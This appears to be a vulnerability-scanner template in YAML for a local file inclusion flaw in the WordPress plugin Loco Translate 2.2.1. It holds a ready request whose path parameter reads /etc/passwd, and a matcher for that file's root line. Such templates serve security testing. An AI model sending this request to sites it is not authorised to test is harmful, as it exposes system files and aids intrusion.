19 lines
501 B
YAML
19 lines
501 B
YAML
|
id: wp-loco-translate-lfi
|
||
|
|
||
|
info:
|
||
|
name: WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion
|
||
|
author: 0x240x23elu
|
||
|
severity: high
|
||
|
reference: https://www.exploit-db.com/exploits/46619
|
||
|
tags: wordpress,wp-plugin,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view"
|
||
|
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0:"
|
||
|
part: body
|